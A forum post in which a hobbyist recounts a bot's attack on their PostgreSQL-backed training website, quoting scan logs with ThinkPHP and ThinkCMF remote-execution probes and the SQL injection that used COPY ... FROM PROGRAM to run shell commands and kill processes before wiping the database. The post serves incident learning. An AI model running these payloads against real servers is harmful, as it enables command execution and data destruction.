I had this attack like a month ago. I show some more info.
I had my personal website (just for training) on VPS (RedHat/Amazon Web Services).
I had there PostgreSQL DB, and access to it from website via POST/GET methods by Python/psycopg2 script, Apache and thats all. When backend got POST/GET request it logged as db user and perform INSERT/SELECT. My database that contained ~8 numbers (and was called "numbers") has been deleted and they replaced it with:
xd
In logs I can see that attacking bot was looking for lot of standard weakpoints, here aiming f.e. myphpadmin and wordpress(this is just few of them, I didn't have any PHP on site so these are blind tries):
Code:
"GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 823 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209
"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 823 "-" "Mozilla/5.0 (...) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - -
"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 207 "-" "Mozilla/5.0 (...) Chrome/78.0.3904.108 Safari/537.36"
...
"GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
"GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
"GET //pma/scripts/setup.php HTTP/1.1" 404 219 "-" "-"
"GET //myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
"GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
...
"GET /wordpress/ HTTP/1.1" 404 208 "-"
...
Finally bot found GET/POST methods and performed SQL Injection in my case :
Code:
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'cat /proc/cpuinfo' encoding 'gbk'; - hmmm?
SELECT * FROM cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'ps auxw|grep -v grep|grep -v nginx|sort -rn -k3|awk {if($3>50.0) print $2}|xargs kill -9' encoding 'gbk';
- Checks for open processes take more than 50% of cpu and kills them.
SELECT * FROM cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'killall postgresq1' encoding 'gbk';
SELECT * FROM cmd_exec;
STATEMENT: SELECT pg_terminate_backend(pg_stat_activity.procpid) FROM pg_stat_activity WHERE pg_stat_activity.datname = 'please_read_me_xmg' AND procpid <> pg_backend_pid();
- Here bot created db with "WARNING"
Also tried to log as root:
DETAIL: Role "root" does not exist.
To prevent such attack one needs to use database users and priviliges properly, always pass arguments to database driver, hide (and hash?) all source code and doble check request in script. Propably a lot more, but Im noob. Still should be enough against blind bot.
Whole attack lasted for 5 days according to logs. If I was watching them, I could react.
a) wipe the whole system and start over.
After that attack I have changed my server provider and OS to FreeBSD.
Never expose SQL to the Internet.
How should I connect (add/remove items f.e.) to database from website then in short words? Maybe you know some good texts about it ?
Cheers